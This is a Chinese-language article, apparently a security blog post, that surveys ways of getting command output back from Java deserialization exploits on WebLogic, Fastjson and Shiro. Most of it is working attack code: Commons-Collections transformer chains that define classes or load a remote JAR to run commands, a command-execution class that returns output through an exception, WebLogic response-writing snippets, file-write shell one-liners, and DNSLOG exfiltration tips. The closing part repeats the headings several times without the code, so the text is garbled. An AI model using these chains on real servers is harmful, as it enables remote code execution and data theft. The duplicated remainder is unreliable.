Java反序列化回显技术全面解析<\/h1>

写在文前<\/h2>
本文全面探讨Java反序列化漏洞中的回显技术，总结了多种实现方式，适用于weblogic、fastjson、shiro等反序列化漏洞场景。<\/p>

defineClass技术<\/h2>
`defineClass<\/code>是ClassLoader<\/code>类的核心方法，用于通过字节码定义类。<\/p>`

实现原理<\/h3>
public<\/span> class<\/span> MyClassLoader<\/span> extends<\/span> ClassLoader {<\/span>
<\/span><\/span>    private<\/span> static<\/span> String myClassName =<\/span> "com.test.ClassLoader.HelloWorld"<\/span>;<\/span>
<\/span><\/span>    private<\/span> static<\/span> byte<\/span>[]<\/span> bs =<\/span> new<\/span> byte<\/span>[]{...};<\/span> \/\/ 类字节码
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> findClass(<\/span>String name)<\/span> throws<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        if<\/span> (<\/span>name ==<\/span> myClassName)<\/span> {<\/span>
<\/span><\/span>            return<\/span> defineClass(<\/span>myClassName,<\/span> bs,<\/span> 0<\/span>,<\/span> bs.<\/span>length<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>findClass<\/span>(<\/span>name);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>使用方式<\/h3>

继承ClassLoader<\/code>类<\/li>
重写findClass<\/code>方法<\/li>
在方法中调用defineClass<\/code>加载恶意类<\/li>
通过反射调用类方法<\/li>
<\/ol>
RMI绑定实例回显<\/h2>
利用commons-collections反射调用defineClass，通过RMI实现回显。<\/p>
关键代码<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>DefiningClassLoader.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getDeclaredConstructor"<\/span>,<\/span> new<\/span> Class[]{<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"defineClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>className,<\/span> classBytes}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"main"<\/span>,<\/span> new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{<\/span>null<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>new<\/span> HashSet())<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>实现步骤<\/h3>

定义恶意命令执行类，继承Remote<\/code>接口<\/li>
使用CC链反射调用defineClass<\/code><\/li>
将类对象绑定到RMI服务<\/li>
通过JNDI调用获取回显<\/li>
<\/ol>
URLClassLoader异常回显<\/h2>
通过将回显结果封装到异常信息中抛出。<\/p>
命令执行类<\/h3>
public<\/span> class<\/span> ProcessExec<\/span> {<\/span>
<\/span><\/span>    public<\/span> ProcessExec<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        InputStream stream =<\/span> new<\/span> ProcessBuilder(<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> cmd).<\/span>start<\/span>().<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>        BufferedReader reader =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>stream,<\/span> "gbk"<\/span>));<\/span>
<\/span><\/span>        StringBuffer buffer =<\/span> new<\/span> StringBuffer();<\/span>
<\/span><\/span>        String line;<\/span>
<\/span><\/span>        
<\/span><\/span>        while<\/span>((<\/span>line =<\/span> reader.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            buffer.<\/span>append<\/span>(<\/span>line).<\/span>append<\/span>(<\/span>"\n"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        throw<\/span> new<\/span> Exception(<\/span>buffer.<\/span>toString<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>使用方式<\/h3>

将类打包为JAR文件<\/li>
使用URLClassLoader加载<\/li>
通过CC链反射调用<\/li>
<\/ol>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>URLClassLoader.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getConstructor"<\/span>,<\/span> new<\/span> Class[]{<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Class[]{<\/span>URL[].<\/span>class<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Object[]{<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/127.0.0.1\/p.jar"<\/span>)}}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"ProcessExec"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getConstructor"<\/span>,<\/span> new<\/span> Class[]{<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Class[]{<\/span>String.<\/span>class<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> String[]{<\/span>"ipconfig"<\/span>}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>中间件回显技术<\/h2>
Tomcat回显方法<\/h3>

基于内存Webshell<\/strong>：动态注册Filter实现回显<\/li>
文件操作符写入<\/strong>：将结果写入文件描述符<\/li>
线程上下文获取<\/strong>：通过Thread.currentThread().getContextClassLoader()<\/code>获取request\/response<\/li>
Register获取<\/strong>：直接从Register获取process对应的request<\/li>
<\/ol>
Weblogic回显代码<\/h3>
Weblogic 10.3.6<\/h4>
String cmd =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletRequestImpl<\/span>)((<\/span>weblogic.<\/span>work<\/span>.<\/span>ExecuteThread<\/span>)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>()).<\/span>getHeader<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletResponseImpl<\/span> response =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletRequestImpl<\/span>)((<\/span>weblogic.<\/span>work<\/span>.<\/span>ExecuteThread<\/span>)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>()).<\/span>getResponse<\/span>();<\/span>
<\/span><\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletOutputStreamImpl<\/span> outputStream =<\/span> response.<\/span>getServletOutputStream<\/span>();<\/span>
<\/span><\/span>outputStream.<\/span>writeStream<\/span>(<\/span>new<\/span> weblogic.<\/span>xml<\/span>.<\/span>util<\/span>.<\/span>StringInputStream<\/span>(<\/span>cmd));<\/span>
<\/span><\/span>outputStream.<\/span>flush<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>Weblogic 12.1.3<\/h4>
Field field =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>provider<\/span>.<\/span>ContainerSupportProviderImpl<\/span>.<\/span>WlsRequestExecutor<\/span>)<\/span>this<\/span>.<\/span>getCurrentWork<\/span>()).<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"connectionHandler"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>HttpConnectionHandler httpConn =<\/span> (<\/span>HttpConnectionHandler)<\/span> field.<\/span>get<\/span>(<\/span>this<\/span>.<\/span>getCurrentWork<\/span>());<\/span>
<\/span><\/span>httpConn.<\/span>getServletRequest<\/span>().<\/span>getResponse<\/span>().<\/span>getServletOutputStream<\/span>().<\/span>writeStream<\/span>(<\/span>new<\/span> weblogic.<\/span>xml<\/span>.<\/span>util<\/span>.<\/span>StringInputStream<\/span>(<\/span>"result"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>文件写入回显<\/h2>
Linux实现<\/h3>
cd $(<\/span>find -name "test.html"<\/span> -type f -exec dirname {}<\/span> \;<\/span> | sed 1q)<\/span> &&<\/span> echo `<\/span>id`<\/span> > 1.txt
<\/span><\/span><\/code><\/pre>Windows PowerShell实现<\/h3>
$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue
<\/span><\/span>$f = -Join($file.DirectoryName,"\/a.txt"<\/span>)
<\/span><\/span>echo 222 | Out-File $f
<\/span><\/span><\/code><\/pre>DNSLOG回显<\/h2>
使用技巧：<\/p>

使用PowerShell或base64编码命令，避免特殊字符问题<\/li>
选择小众DNSLOG平台提高成功率<\/li>
<\/ol>
参考资源<\/h2>

ClassLoader原理<\/a><\/li>
Weblogic回显构造<\/a><\/li>
Tomcat回显方法<\/a><\/li>
内存Webshell技术<\/a><\/li>
<\/ol>

Java反序列化回显技术全面解析<\/h1>

写在文前<\/h2> 本文全面探讨Java反序列化漏洞中的回显技术，总结了多种实现方式，适用于weblogic、fastjson、shiro等反序列化漏洞场景。<\/p>

defineClass技术<\/h2> defineClass<\/code>是ClassLoader<\/code>类的核心方法，用于通过字节码定义类。<\/p>

RMI绑定实例回显<\/h2> 利用commons-collections反射调用defineClass，通过RMI实现回显。<\/p>

URLClassLoader异常回显<\/h2> 通过将回显结果封装到异常信息中抛出。<\/p>

中间件回显技术<\/h2>

Weblogic回显代码<\/h3>

文件写入回显<\/h2>

参考资源<\/h2> ClassLoader原理<\/a><\/li> Weblogic回显构造<\/a><\/li> Tomcat回显方法<\/a><\/li> 内存Webshell技术<\/a><\/li> <\/ol>

写在文前<\/h2>
本文全面探讨Java反序列化漏洞中的回显技术，总结了多种实现方式，适用于weblogic、fastjson、shiro等反序列化漏洞场景。<\/p>

defineClass技术<\/h2>
`defineClass<\/code>是ClassLoader<\/code>类的核心方法，用于通过字节码定义类。<\/p>`

RMI绑定实例回显<\/h2>
利用commons-collections反射调用defineClass，通过RMI实现回显。<\/p>

URLClassLoader异常回显<\/h2>
通过将回显结果封装到异常信息中抛出。<\/p>

参考资源<\/h2>

ClassLoader原理<\/a><\/li>
Weblogic回显构造<\/a><\/li>
Tomcat回显方法<\/a><\/li>
内存Webshell技术<\/a><\/li> <\/ol>